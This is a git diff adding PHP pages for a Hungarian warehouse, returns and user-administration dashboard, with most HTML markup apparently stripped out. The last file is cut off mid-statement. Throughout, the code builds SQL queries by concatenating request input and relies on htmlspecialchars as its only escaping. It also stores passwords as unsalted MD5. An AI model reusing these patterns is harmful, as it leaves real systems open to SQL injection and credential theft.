    + + + + + diff --git a/dashboard/return_goods.php b/dashboard/return_goods.php new file mode 100644 index 0000000..d64bafe --- /dev/null +++ b/dashboard/return_goods.php @@ -0,0 +1,850 @@ +25 db / oldal + + + + + "; + $perpageselect = str_replace("value='".$maxperpage."'", "value='".$maxperpage."' selected", $perpageselect); + + $json = json_encode(array( + 'perpage' => $perpageselect, + 'result' => 'ok' + )); + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "LoadTable") { + $maxperpage = intval(htmlspecialchars($_POST["perpage"])); + $cpage = intval(htmlspecialchars($_POST["cpage"])); + + $name = htmlspecialchars($_POST["name"]); + $track_id = htmlspecialchars($_POST["track_id"]); + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $date = htmlspecialchars($_POST["date"]); + $is_saved = htmlspecialchars($_POST["is_saved"]); + + $addquery = ""; + $isfirst = true; + + if ($cpage == 0) { + $cpage = 1; + } + setcookie("maxperpage", $maxperpage, time() + (86400 * 90), "/"); + + if ($name != "") { + if ($isfirst) { + $addquery = $addquery." WHERE name LIKE '%".$name."%'"; + $isfirst = false; + } else { + $addquery = $addquery." and item_id LIKE '%".$name."%'"; + } + } + + if ($track_id != "") { + if ($isfirst) { + $addquery = $addquery." WHERE (pack_id LIKE '%$track_id%' OR order_id LIKE '%$track_id%')"; + $isfirst = false; + } else { + $addquery = $addquery." and (pack_id LIKE '%$track_id%' OR order_id LIKE '%$track_id%')"; + } + } + + if ($item_id != "") { + if ($isfirst) { + $addquery = $addquery." WHERE item_id LIKE '%".$item_id."%'"; + $isfirst = false; + } else { + $addquery = $addquery." and item_id LIKE '%".$item_id."%'"; + } + } + + if ($date != "") { + if ($isfirst) { + $addquery = $addquery." WHERE DATE(FROM_UNIXTIME(return_date)) = '".$date."'"; + $isfirst = false; + } else { + $addquery = $addquery." and DATE(FROM_UNIXTIME(return_date)) = '".$date."'"; + } + } + + if ($is_saved != "") { + if ($is_saved == "1") { + if ($isfirst) { + $addquery = $addquery." WHERE is_saved = '1'"; + $isfirst = false; + } else { + $addquery = $addquery." and is_saved = '1'"; + } + } else { + if ($isfirst) { + $addquery = $addquery." WHERE COALESCE(is_saved, 0) != 1"; + $isfirst = false; + } else { + $addquery = $addquery." and COALESCE(is_saved, 0) != 1"; + } + } + } + + $sql = mysqli_query($conn,"SELECT COUNT(*) FROM return_goods".$addquery); + $count = mysqli_fetch_array($sql)[0]; + + $addquery = $addquery." ORDER BY return_date DESC"; + + $maxpage = ceil($count / $maxperpage); + if (!($cpage >= 1 && $cpage <= $maxpage)) { + $cpage = 1; + } + + $limit = ($cpage - 1) * $maxperpage; + + $responseStr = ''; + + $query = "SELECT return_id, name, COALESCE(NULLIF(order_id,''), pack_id) as the_id, item_id, return_date, is_saved FROM return_goods".$addquery." LIMIT $limit, $maxperpage"; + if ($result = $conn->query($query)) { + while ($c_prod = $result->fetch_assoc()) { + + if ($responseStr != "") { + $responseStr .= "|%|"; + } + $responseStr .= $c_prod['return_id'].'/!/'.$c_prod['name'].'/!/'.$c_prod['the_id'].'/!/'.$c_prod['item_id'].'/!/'.date("Y. m. d.", $c_prod['return_date']).'/!/'.$c_prod['is_saved']; + } + } + + echo '{"result": "ok", "data": "'.$responseStr.'", "maxpage": "'.$maxpage.'", "cpage": "'.$cpage.'"}'; + + } else if (htmlspecialchars($_POST["func"]) == "CreateReturn") { + $name = 'temp_'.bin2hex(random_bytes(24)); + $sql = mysqli_query($conn,"INSERT INTO return_goods(name) VALUES ('$name')"); + $rid = mysqli_insert_id($conn); + + $json = json_encode(array( + 'return_id' => $rid, + 'result' => 'ok' + )); + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "OpenRetun") { + $rid = htmlspecialchars($_POST["return_id"]); + + $sql = mysqli_query($conn,"SELECT * FROM return_goods WHERE return_id = '$rid'"); + $data = mysqli_fetch_array($sql); + + $json = json_encode(array( + 'data' => $data, + 'result' => 'ok' + )); + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "AutoSaveReturn") { + $return_id = htmlspecialchars($_POST["return_id"]); + $param = htmlspecialchars($_POST["param"]); + $value = htmlspecialchars($_POST["value"]); + + $params = ['name', 'item_id', 'pack_id', 'order_id', 'return_reason', 'is_withdraw', 'cancellation_invoice', 'is_scrap', 'is_warehoused', 'reason', 'note', 'return_date', 'is_saved']; + if (!(!empty($param) && in_array($param,$params))) { + echo json_encode(array('result' => 'Hibás paraméter lett megadva!')); + exit(); + } + + if ($param == "return_date" && $value != "") { + $value = strtotime($value); + } + + if ($param == "item_id" && $value != "") { + $sql = mysqli_query($conn,"SELECT item_id FROM pr_parameters WHERE item_id = '$value'"); + $data = mysqli_fetch_array($sql); + if ($data != null) { + $value = $data['item_id']; + } else { + echo json_encode(array('result' => 'Nem létező cikkszámot adott meg!')); + exit(); + } + } + + if ($return_id != "") { + $sql = mysqli_query($conn,"UPDATE return_goods SET $param='$value' WHERE return_id = '$return_id'"); + } else { + $sql = mysqli_query($conn, "INSERT INTO return_goods($param) VALUES ('$value')"); + $return_id = mysqli_insert_id($conn); + } + + echo json_encode(array('result' => 'ok', 'return_id' => $return_id)); + + } else if (htmlspecialchars($_POST["func"]) == "SaveReturn") { + $return_id = htmlspecialchars($_POST["return_id"]); + + $name = htmlspecialchars($_POST["name"]); + $return_date = htmlspecialchars($_POST["return_date"]); + $item_id = htmlspecialchars($_POST["item_id"]); + $pack_id = htmlspecialchars($_POST["pack_id"]); + $order_id = htmlspecialchars($_POST["order_id"]); + $return_reason = htmlspecialchars($_POST["return_reason"]); + $is_withdraw = htmlspecialchars($_POST["is_withdraw"]); + $cancellation_invoice = htmlspecialchars($_POST["cancellation_invoice"]); + $is_scrap = htmlspecialchars($_POST["is_scrap"]); + $is_warehoused = htmlspecialchars($_POST["is_warehoused"]); + $reason = htmlspecialchars($_POST["reason"]); + $note = htmlspecialchars($_POST["note"]); + + if ($return_date != "") { + $return_date = strtotime($return_date); + } + + if ($item_id != "") { + $sql = mysqli_query($conn,"SELECT item_id FROM pr_parameters WHERE item_id = '$item_id'"); + $data = mysqli_fetch_array($sql); + if ($data != null) { + $item_id = $data['item_id']; + } else { + echo json_encode(array('result' => 'Nem létező cikkszámot adott meg!')); + exit(); + } + } + + if ($return_id == "") { + $sql = mysqli_query($conn, "INSERT INTO return_goods(name) VALUES ('$name')"); + $return_id = mysqli_insert_id($conn); + } + + $sql = mysqli_query($conn,"UPDATE return_goods SET + name = '$name', + item_id = '$item_id', + pack_id = '$pack_id', + order_id = '$order_id', + return_reason = '$return_reason', + is_withdraw = '$is_withdraw', + cancellation_invoice = '$cancellation_invoice', + is_scrap = '$is_scrap', + is_warehoused = '$is_warehoused', + reason = '$reason', + note = '$note' + WHERE return_id = '$return_id'"); + + if ($return_date != "") { + $sql = mysqli_query($conn,"UPDATE return_goods SET return_date = $return_date WHERE return_id = '$return_id'"); + } else { + $sql = mysqli_query($conn,"UPDATE return_goods SET return_date = NULL WHERE return_id = '$return_id'"); + } + + echo json_encode(array('result' => 'ok', 'return_id' => $return_id)); + + } + + exit(); +} + +?> + + + + + + + Kezelőfelület + + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + +

    Visszáru

    + +
    +
    +

    Neve:

    + +
    +

    Csomag / Rendelés szám

    + +
    +

    Cikkszám

    + +
    +

    Dátum kiválasztása:

    + +
    +

    Lezárt elemek:

    + +
    +

    Oldalanként:

    + +
    +

    :

    + +
    + +
    +

    :

    + +
    +
    + +
    +
    +
    + +
    +
    + + + + + + + + + + + + +
    NeveRendelés / Csomag számCikkszámDátumMegnyitás
    +
    +
    + +
    +
    +

    <    0 / 0    >

    +
    + +


    + + +
    + + + + diff --git a/dashboard/usereditor.php b/dashboard/usereditor.php new file mode 100644 index 0000000..ea83fbc --- /dev/null +++ b/dashboard/usereditor.php @@ -0,0 +1,764 @@ +encode($name, 'S1TU'); + $addquery = $addquery." WHERE uname LIKE '%".$name."%'"; + $isfirst = false; + } + + $sql = mysqli_query($conn,"SELECT COUNT(*) FROM users".$addquery); + $count = mysqli_fetch_array($sql)[0]; + + $maxpage = ceil($count / $maxperpage); + if (!($cpage >= 1 && $cpage <= $maxpage)) {$cpage = 1;} + + $UserItems = []; + $query = "SELECT * FROM users".$addquery; + if ($result = $conn->query($query)) { + while ($cuser = $result->fetch_assoc()) { + + $Current_full_name = $coderclass->decode($cuser['full_name'], 'TIT4'); + $Current_position = $coderclass->decode($cuser['position'], 'SWI2'); + $Current_perms = $coderclass->decode($cuser['perms'], 'AFDG'); + + $Current_perms_List = explode(', ', $Current_perms); + $CurrentUserPermList = array(); + for ($i=0; $i < count($Current_perms_List); $i++) { + $cpid = $Current_perms_List[$i]; + $sql = mysqli_query($conn,"SELECT risk_factor, perm_status FROM perm_database WHERE perm_id = '$cpid'"); + $tempSQL = mysqli_fetch_array($sql); + if ($tempSQL != null) { + if ($tempSQL[1] != "0") { + array_push($CurrentUserPermList, $tempSQL[0]); + } + } + } + + sort($CurrentUserPermList); + + if (empty($CurrentUserPermList)) { + array_push($CurrentUserPermList, null); + } + + if (!($CurrentUserPermList[0] == 0 && !UserHasPerm('god_profile')) || $Current_perms == "") { + $UserItems[] = [ + 'uid' => $cuser['uid'], + 'full_name' => $Current_full_name, + 'position' => $Current_position, + 'risk_factor' => $CurrentUserPermList[0] + ]; + } + } + } + + if ($orderby != "") { + usort($UserItems, function ($a, $b) { + global $orderby; + return strcoll($a[$orderby], $b[$orderby]); + }); + } else { + usort($UserItems, function ($a, $b) { + return strcoll($a['full_name'], $b['full_name']); + }); + } + + $PrintableUserItems = getItemsSlice($UserItems, $cpage, $maxperpage); + + $responseStr = ''; + for ($i=0; $i < count($PrintableUserItems); $i++) { + if ($responseStr != "") { + $responseStr = $responseStr."%"; + } + + $responseStr = $responseStr.$PrintableUserItems[$i]['uid'].'|'.$PrintableUserItems[$i]['full_name'].'|'.$PrintableUserItems[$i]['position'].'|'.$PrintableUserItems[$i]['risk_factor']; + } + + echo '{"result": "ok", "data": "'.$responseStr.'", "maxpage": "'.$maxpage.'", "cpage": "'.$cpage.'"}'; + } else if (htmlspecialchars($_POST["func"]) == "filter") { + + $name = array(); + $query = "SELECT uname FROM users"; + if ($result = $conn->query($query)) { + while ($cuser = $result->fetch_assoc()) { + array_push($name, $coderclass->decode($cuser['uname'], "S1TU")); + } + } + + sort($name); + $names = ""; + for ($i=0; $i < count($name); $i++) { + $names = $names.""; + } + + if (!isset($_COOKIE['maxperpage'])) { + setcookie("maxperpage", "25", time() + (86400 * 90), "/"); + $maxperpage = "25"; + } else { + $maxperpage = $_COOKIE['maxperpage']; + } + + setcookie("maxperpage", strval($maxperpage), time() + (86400 * 90), "/"); + + $perpageselect = " + + + + + "; + $perpageselect = str_replace("value='".$maxperpage."'", "value='".$maxperpage."' selected", $perpageselect); + + $json = json_encode(array( + 'name' => $names, + 'perpage' => $perpageselect, + 'result' => 'ok' + )); + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "createuser") { + if (UserHasPerm('user_edit_perm')) { + $tempID = bin2hex(random_bytes(24)); + $sql = mysqli_query($conn,"INSERT INTO users(full_name, perms, status) VALUES ('564946704637584974726d6975623239564c7179462b652f61594655', '$tempID', -1)"); + + $sql = mysqli_query($conn,"SELECT uid FROM users WHERE perms = '$tempID' and status = -1"); + $user = mysqli_fetch_array($sql); + + $CreatedUserID = $user[0]; + + $json = json_encode(array( + 'uid' => $CreatedUserID, + 'result' => 'ok' + )); + + $sql = mysqli_query($conn,"UPDATE users SET perms='' WHERE uid = '$CreatedUserID'"); + } else { + $json = json_encode(array( + 'result' => 'Jogosultság megtagadva! Önnek nincsen joga felhasználót létrehozni!' + )); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "openuser") { + $uid = intval(htmlspecialchars($_POST["uid"])); + $toedit = htmlspecialchars($_POST["toedit"]); + if ($toedit == "true") { + $toedit = true; + } else { + $toedit = false; + } + + $sql = mysqli_query($conn,"SELECT * FROM users WHERE uid = $uid"); + $user = mysqli_fetch_array($sql); + + if ($user == null) { + echo json_encode(array('result' => 'Ilyen felhasználói azonosítóval nem létezik fiók! Próbálja újra!')); + exit(); + } + + $PermsList = $coderclass->decode($user["perms"], 'AFDG'); + $PermListArr = explode(", ", $PermsList); + $CurrentPermList = array(); + $CurrentPermRisk = array(); + for ($i=0; $i < count($PermListArr); $i++) { + $cpid = $PermListArr[$i]; + $sql = mysqli_query($conn,"SELECT short_name, risk_factor, perm_status FROM perm_database WHERE perm_id = '$cpid'"); + $tempSQL = mysqli_fetch_array($sql); + $name = $coderclass->decode($tempSQL['short_name'] ?? '', "HA98"); + array_push($CurrentPermList, $tempSQL[1]."|".$name."|".$tempSQL[2]); + + array_push($CurrentPermRisk, $tempSQL[1]); + } + sort($CurrentPermList); + sort($CurrentPermRisk); + + $Perms = ''; + $PermListToJS = $PermsList; + if ($toedit && UserHasPerm('user_edit_perm')) { + $Perms = ""; + + $permlist = array(); + $query = "SELECT perm_category, perm_id, short_name FROM perm_database WHERE perm_status != 2"; + if ($result = $conn->query($query)) { + while ($cperm = $result->fetch_assoc()) { + + $name = $coderclass->decode($cperm['short_name'], 'HA98'); + array_push($permlist, $cperm['perm_category']."|".$cperm['perm_id']."|".$name); + + } + } + sort($permlist); + $printedCat = array(); + + for ($i=0; $i < count($permlist); $i++) { + $TempArr = explode("|", $permlist[$i]); + + if (!in_array($TempArr[0], $printedCat)) { + array_push($printedCat, $TempArr[0]); + $Perms .= "".$TempArr[0].""; + } + + if (str_contains($PermsList, $TempArr[1])) { + $Perms .= "".$TempArr[2]." - ".$TempArr[1]."
    "; + } else { + $Perms .= "".$TempArr[2]." - ".$TempArr[1]."
    "; + } + + } + + $Perms .= ""; + } else { + $Perms = ""; + } + + $can_edit = false; + if (UserHasPerm('user_edit_perm') && ($CurrentPermRisk[0] != 0 || $PermsList == "")) { + $can_edit = true; + } else if (UserHasPerm('god_profile')) { + $can_edit = true; + } + + if ($user != null) { + $otp = ""; + if ($user["otphash"] != "") { + $otp = $user["otptype"]; + } + + $json = json_encode(array( + 'uname' => $coderclass->decode($user["uname"], 'S1TU'), + 'full_name' => $coderclass->decode($user["full_name"], 'TIT4'), + 'mail' => $coderclass->decode($user["mail"], 'A7SO'), + 'position' => $coderclass->decode($user["position"], 'SWI2'), + 'note' => $coderclass->decode($user["note"], 'AH1K'), + 'perms' => $Perms, + 'PermListToJS' => $PermListToJS, + 'status' => $user["status"], + 'can_edit' => $can_edit, + 'otp' => $otp, + 'result' => 'ok' + )); + } else { + $json = json_encode(array('result' => 'A felhasználó azonosítója hibás! Próbálja újra.')); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "saveuser") { + $uid = intval(htmlspecialchars($_POST["uid"])); + if (htmlspecialchars($_POST["status"]) == "true") {$status = "1";} else {$status = "0";} + + if ($status == "0" && $uid == $userID) { + echo json_encode(array('result' => 'A saját fiókodat nem tudod deaktiválni!')); + exit(); + } + + $uname = $coderclass->encode(htmlspecialchars($_POST["uname"]), "S1TU"); + if ($uname == "") { + echo json_encode(array('result' => 'Kötelező megadni egy felhasználó nevet!')); + exit(); + } + $sql = mysqli_query($conn,"SELECT uid FROM users WHERE uname = '$uname'"); + $tempSQL = mysqli_fetch_array($sql); + if ($tempSQL != null && $tempSQL[0] != $uid) { + echo json_encode(array('result' => 'Ilyen felhasználónévvel már létezik fiók! Adjon meg mást!')); + exit(); + } + + $full_name = $coderclass->encode(htmlspecialchars($_POST["full_name"]), "TIT4"); + if (filter_var(htmlspecialchars($_POST["mail"]), FILTER_VALIDATE_EMAIL) !== false) { + $mail = $coderclass->encode(htmlspecialchars($_POST["mail"]), "A7SO"); + } else if($_POST["mail"] == "") { + $mail = ""; + } else { + echo json_encode(array('result' => 'Az email cím nem felel meg a formai követelményeknek!')); + exit(); + } + $position = $coderclass->encode(htmlspecialchars($_POST["position"]), "SWI2"); + $note = $coderclass->encode(htmlspecialchars($_POST["note"]), "AH1K"); + if (!UserHasPerm('god_profile')) { + $perms = $coderclass->encode(str_replace('god_profile', '', str_replace(', god_profile', '', htmlspecialchars($_POST["perms"]))), "AFDG"); + } else { + $perms = $coderclass->encode(htmlspecialchars($_POST["perms"]), "AFDG"); + } + + $userpass = htmlspecialchars($_POST["upass"]); + if (!(strlen($userpass) >= 6 && preg_match('/[a-z]/', $userpass) && preg_match('/[A-Z]/', $userpass) && preg_match('/[0-9]/', $userpass)) && $userpass != "") { + echo json_encode(array('result' => 'A megadott jelszó nem felel meg a formai követelményeknek!')); + exit(); + } else if($userpass != "") { + $md5_userpass = md5($userpass); + } + + if (UserHasPerm('user_edit_perm')) { + if ($userpass != "") { + $sql = mysqli_query($conn,"UPDATE users SET uname='$uname',upass='$md5_userpass',full_name='$full_name',mail='$mail',position='$position',note='$note',perms='$perms',status=$status WHERE uid = $uid"); + } else { + $sql = mysqli_query($conn,"UPDATE users SET uname='$uname',full_name='$full_name',mail='$mail',position='$position',note='$note',perms='$perms',status=$status WHERE uid = $uid"); + } + $json = json_encode(array('result' => 'ok')); + } else { + $json = json_encode(array('result' => 'Jogosultság megtagadva! Önnek nincsen joga felhasználót módosítani!')); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "DeactivateOTP") { + $uid = intval(htmlspecialchars($_POST["uid"])); + if (!UserHasPerm('user_edit_perm')) { + $json = json_encode(array('result' => 'Jogosultság megtagadva! Önnek nincsen joga felhasználót módosítani!')); + } else if ($uid == $userID) { + $json = json_encode(array('result' => 'A saját kétlépcsős hitelesítésének deaktiválását a fiók menupont alatt teheti meg!')); + } else { + $sql = mysqli_query($conn,"UPDATE users SET otphash = '' WHERE uid = '$uid'"); + $json = json_encode(array('result' => 'ok')); + } + + echo $json; + } + + exit(); +} + +?> + + + + + + + Kezelőfelület + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + +

    Felhasználók

    + +
    +
    +

    Felhasználónév:

    + + + +
    +

    Oldalanként:

    + +
    +

    :

    + +
    +

    :

    ';}?> +
    + +
    +
    +
    + +
    +
    + + + + + + + + + + + + +
    Teljes neveBeosztásaKockázati tényezőAdatlap
    +
    +
    + +
    +
    +

    <    0 / 0    >

    +
    + +


    + + + + + + + + diff --git a/dashboard/version_controll.php b/dashboard/version_controll.php new file mode 100644 index 0000000..bcfb947 --- /dev/null +++ b/dashboard/version_controll.php @@ -0,0 +1,282 @@ + &$update) { + if ($update['build'] === $build) { + if (isset($update['changes'][$idx])) { + array_splice($update['changes'], $idx, 1); + if (count($update['changes']) === 0) { + array_splice($versionData['updates'], $uKey, 1); + } + file_put_contents($jsonFile, json_encode($versionData, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT)); + } + break; + } + } + +} +if (isset($_POST['build'])) { + http_response_code(204); + exit(); +} + +$versionData = []; +if (file_exists($jsonFile)) { + $jsonContent = file_get_contents($jsonFile); + $versionData = json_decode($jsonContent, true); + if (!is_array($versionData)) { + $versionData = ['updates' => []]; + } +} else { + $versionData = ['updates' => []]; +} + +// Alapértelmezett értékek a legutóbbi build alapján +$defaultEnv = 'l'; // Éles +$defaultStatus = 'a'; // Aktív +$defaultDateTime = date('Y-m-d\TH:i'); + +if (!empty($versionData['updates'])) { + $lastBuild = $versionData['updates'][0]['build']; + if (strlen($lastBuild) >= 2) { + $defaultEnv = substr($lastBuild, 0, 1); + $defaultStatus = substr($lastBuild, 1, 1); + $timestamp = (int) substr($lastBuild, 2); + $defaultDateTime = date('Y-m-d\TH:i', $timestamp); + } +} + +$message = ''; +if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['env']) && isset($_POST['status']) && isset($_POST['datetime']) && isset($_POST['change']) && isset($_POST['anticsrfid']) && $_POST['anticsrfid'] == $_SESSION["anticsrfid"]) { + $env = trim($_POST['env']); + $status = trim($_POST['status']); + $datetime = trim($_POST['datetime']); + $change = trim($_POST['change']); + + if ($env !== '' && $status !== '' && $datetime !== '' && $change !== '') { + // Build szám generálása + $timestamp = strtotime($datetime); + $build = $env . $status . $timestamp; + + $found = false; + foreach ($versionData['updates'] as &$update) { + if ($update['build'] === $build) { + if (!in_array($change, $update['changes'], true)) { + array_unshift($update['changes'], $change); + } + $found = true; + break; + } + } + unset($update); + if (!$found) { + array_unshift($versionData['updates'], [ + 'build' => $build, + 'changes' => [$change] + ]); + } + if (file_put_contents($jsonFile, json_encode($versionData, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT)) === false) { + $message = 'Mentés sikertelen: nem lehet írni a fájlt. Útvonal: ' . htmlspecialchars($jsonFile); + } else { + $message = 'A változtatás mentve lett. Build szám: ' . htmlspecialchars($build); + } + } else { + $message = 'Minden mező kitöltése kötelező.'; + } +} + +$anticsrfid = bin2hex(random_bytes(24)); +$_SESSION["anticsrfid"] = $anticsrfid; +?> + + + + + + Verzió szerkesztő + + + +
    +
    +

    Új frissítés hozzáadása

    + + + + + +
    +
    + + +
    +
    + + +
    +
    + + + + + + +
    + +
    +

    + '; + foreach ($updates as $update) { + echo '
    '; + $buildNumber = htmlspecialchars($update['build']); + + // Build szám dekódolása + $envChar = substr($buildNumber, 0, 1); + $statusChar = substr($buildNumber, 1, 1); + $timestampPart = substr($buildNumber, 2); + + $envLabel = ($envChar === 'l') ? 'Éles' : 'Teszt'; + $statusLabel = ($statusChar === 'a') ? 'Aktív' : (($statusChar === 'd') ? 'Demó' : 'Béta'); + + echo 'Build szám: #' . $buildNumber . ''; + echo ' (' . $envLabel . ' / ' . $statusLabel . ' - ' . date('Y.m.d. H:i', intval($timestampPart)) . ')
    '; + echo '
      '; + foreach ($update['changes'] as $idx => $change) { + echo '
    • ' + .htmlspecialchars($change).'
    • '; + } + echo '
    '; + } + echo '
    '; + } + ?> + + + + + diff --git a/dashboard/warehouse.php b/dashboard/warehouse.php new file mode 100644 index 0000000..25c4367 --- /dev/null +++ b/dashboard/warehouse.php @@ -0,0 +1,2504 @@ +query($query); + + $locations = []; + if ($result) { + while ($row = $result->fetch_assoc()) { + $locations[$row['location']][] = [ + 'code' => $row['code'], + 'capacity' => intval($row['full_capacity']), + 'warehouse_id' => intval($row['warehouse_id']) + ]; + } + } + + function commonPrefix($str1, $str2) { + $len = min(strlen($str1), strlen($str2)); + for ($i = 0; $i < $len; $i++) { + if ($str1[$i] !== $str2[$i]) { + return substr($str1, 0, $i); + } + } + return substr($str1, 0, $len); + } + + $commonPrefixes = []; + foreach ($locations as $location => $codes) { + $firstCode = array_shift($codes); + $prefix = $firstCode['code']; + $totalCapacity = $firstCode['capacity']; + $totalAmount = 0; + + // Első raktár tartalmának lekérése + $amountQuery = "SELECT SUM(amount) as total_amount FROM warehouse WHERE warehouse_id = " . $firstCode['warehouse_id']; + $amountResult = $conn->query($amountQuery); + if ($amountResult) { + $amountRow = $amountResult->fetch_assoc(); + $totalAmount += intval($amountRow['total_amount']); + } + + foreach ($codes as $codeData) { + $prefix = commonPrefix($prefix, $codeData['code']); + $totalCapacity += $codeData['capacity']; + + // Többi raktár tartalmának lekérése + $amountQuery = "SELECT SUM(amount) as total_amount FROM warehouse WHERE warehouse_id = " . $codeData['warehouse_id']; + $amountResult = $conn->query($amountQuery); + if ($amountResult) { + $amountRow = $amountResult->fetch_assoc(); + $totalAmount += intval($amountRow['total_amount']); + } + + if ($prefix === "") break; + } + + $commonPrefixes[$location] = [ + 'prefix' => $prefix, + 'capacity' => $totalCapacity, + 'amount' => $totalAmount + ]; + } + + $responseStrLoc = ''; + $responseStrCode = ''; + $responseStrCapacity = ''; + $responseStrAmount = ''; + + foreach ($commonPrefixes as $location => $data) { + if ($responseStrLoc != "") { + $responseStrLoc .= "|%|"; + $responseStrCode .= "|%|"; + $responseStrCapacity .= "|%|"; + $responseStrAmount .= "|%|"; + } + $responseStrLoc .= $location; + $responseStrCode .= $data['prefix']; + $responseStrCapacity .= $data['capacity']; + $responseStrAmount .= $data['amount']; + } + + echo '{"result": "ok", "loc": "'.$responseStrLoc.'", "code": "'.$responseStrCode.'", "capacity": "'.$responseStrCapacity.'", "amount": "'.$responseStrAmount.'"}'; + } else if (htmlspecialchars($_POST["func"]) == "OpenLoc") { + $location = htmlspecialchars($_POST["location"]); + $responseStr = ''; + $query = "SELECT name, warehouse_id, status, code FROM warehouse_structure WHERE location = '$location' ORDER BY CAST(SUBSTRING_INDEX(name, '.', 1) AS UNSIGNED) ASC"; + if ($result = $conn->query($query)) { + while ($warehouse = $result->fetch_assoc()) { + if ($responseStr != "") { + $responseStr = $responseStr."|%|"; + } + $responseStr = $responseStr.$warehouse["name"]."|".$warehouse["warehouse_id"]."|".$warehouse["status"]."|".$warehouse["code"]; + } + } + echo '{"result": "ok", "data": "'.$responseStr.'"}'; + } else if (htmlspecialchars($_POST["func"]) == "OpenWarehouse") { + $warehouse_id = htmlspecialchars($_POST["id"]); + $sql = mysqli_query($conn,"SELECT * FROM warehouse_structure WHERE warehouse_id = '$warehouse_id'"); + $warehouse_structure = mysqli_fetch_array($sql); + + $SizeJSON = json_decode(base64_decode($warehouse_structure["size"]), true); + $size = $SizeJSON['globalSize']; + $capacity = $SizeJSON['globalCapacity']; + + $inwarehouse = ''; + $query = "SELECT item_id, position, amount FROM warehouse WHERE warehouse_id = '$warehouse_id' and amount != 0 ORDER BY item_id ASC"; + if ($result = $conn->query($query)) { + while ($warehouse = $result->fetch_assoc()) { + if ($inwarehouse != "") { + $inwarehouse = $inwarehouse."|%|"; + } + $item_id = $warehouse["item_id"]; + + $item_name = ""; + + $inwarehouse = $inwarehouse.$item_id."|".$warehouse["position"]."|".$warehouse["amount"]."|".$item_name; + } + } + + if ($warehouse_structure != null) { + $json = json_encode([ + "result" => "ok", + "name" => $warehouse_structure["name"], + "location" => $warehouse_structure["location"], + "code" => $warehouse_structure["code"], + "row" => $warehouse_structure["row"], + "columns" => $warehouse_structure["columns"], + "fullcapacity" => $warehouse_structure["full_capacity"], + "status" => $warehouse_structure["status"], + "inwarehouse" => $inwarehouse, + "canedit" => UserHasPerm('warehouse_editor'), + "canstatistic" => UserHasPerm('warehouse_statistic'), + "size" => $warehouse_structure["size"] + ]); + } else { + $json = json_encode(["result" => "Nem létezik raktár ezzel az azonosítóval! Próbálja újra."]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "OpenCell") { + $warehouse_id = htmlspecialchars($_POST["warehouse_id"]); + $column = htmlspecialchars($_POST["column"]); + $row = htmlspecialchars($_POST["row"]); + + $sql = mysqli_query($conn,"SELECT size FROM warehouse_structure WHERE warehouse_id = '$warehouse_id'"); + $warehouse_structure = mysqli_fetch_array($sql); + + $sizeJSON = json_decode(base64_decode($warehouse_structure["size"]), true); + $size = $sizeJSON['globalSize']; + if (isset($sizeJSON['customSizes'][$column.':'.$row])) { + $size = $sizeJSON['customSizes'][$column.':'.$row]; + } + + $capacity = $sizeJSON['globalCapacity']; + if (isset($sizeJSON['customCapacity'][$column.':'.$row])) { + $capacity = $sizeJSON['customCapacity'][$column.':'.$row]; + } + + $inwarehouse = ''; + $position = ($row + 1).':'.($column + 1); + $query = "SELECT item_id, amount FROM warehouse WHERE warehouse_id = '$warehouse_id' and position = '$position' and amount != 0 ORDER BY amount ASC"; + if ($result = $conn->query($query)) { + while ($warehouse = $result->fetch_assoc()) { + $inwarehouse = $inwarehouse.'
  • '.$warehouse['item_id'].' - '.$warehouse['amount'].' db
  • '; + } + } + if ($inwarehouse == "") { + $inwarehouse = "
  • Üres
  • "; + } + + if ($warehouse_structure != null) { + $json = json_encode([ + "result" => "ok", + "capacity" => $capacity, + "size" => $size, + "content" => $inwarehouse, + "box_stock_taking" => UserHasPerm("box_stock_taking") + ]); + } else { + $json = json_encode(["result" => "Nem létezik raktár ezzel az azonosítóval! Próbálja újra."]); + } + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "SaveNewWarehouse") { + $name = htmlspecialchars($_POST["name"]); + $loc = htmlspecialchars($_POST["location"]); + $code = htmlspecialchars($_POST["code"]); + $row = $_POST["row"]; + $columns = $_POST["columns"]; + $capacity = $_POST["capacity"]; + + $sql = mysqli_query($conn,"SELECT warehouse_id FROM warehouse_structure WHERE name = '$name' and location = '$loc'"); + $warehouse_structure = mysqli_fetch_array($sql); + if (!UserHasPerm('warehouse_editor')) { + $json = json_encode(["result" => "Önnek nincsen joga új raktárat létrehozni!"]); + } else if ($warehouse_structure != null) { + $json = json_encode(["result" => "Ezen a raktárhelyen létezik ilyen nevű raktár!"]); + } else if ($name == "" || $loc == "" || $code == "" || $row == "" || $columns == "" || $capacity == "") { + $json = json_encode(["result" => "Az összes paraméter megadása kötelező!"]); + } else if (!(ctype_digit($row) && ctype_digit($columns) && ctype_digit($capacity))) { + $json = json_encode(["result" => "Egyes paraméterek nem felelnek meg a formai követelményeknek!"]); + } else { + $size = base64_encode('{"globalSize": "Univerzális", "customSizes": {}, "globalCapacity": "'.$capacity.'", "customCapacity":{}}'); + $sql = mysqli_query($conn,"INSERT INTO warehouse_structure (`name`, `location`, `code`, `row`, `columns`, `size`, `capacity`) VALUES ('$name', '$loc', '$code', '$row', '$columns', '$size', '$capacity')"); + $sql = mysqli_query($conn,"SELECT warehouse_id FROM warehouse_structure WHERE name = '$name' and location = '$loc'"); + $warehouse_structure = mysqli_fetch_array($sql); + $json = json_encode(["result" => "ok", "wid" => $warehouse_structure["warehouse_id"]]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "EditWarehouse") { + $warehouse_id = htmlspecialchars($_POST["warehouse_id"]); + + $sql = mysqli_query($conn,"SELECT * FROM warehouse_structure WHERE warehouse_id = '$warehouse_id'"); + $warehouse_structure = mysqli_fetch_array($sql); + if 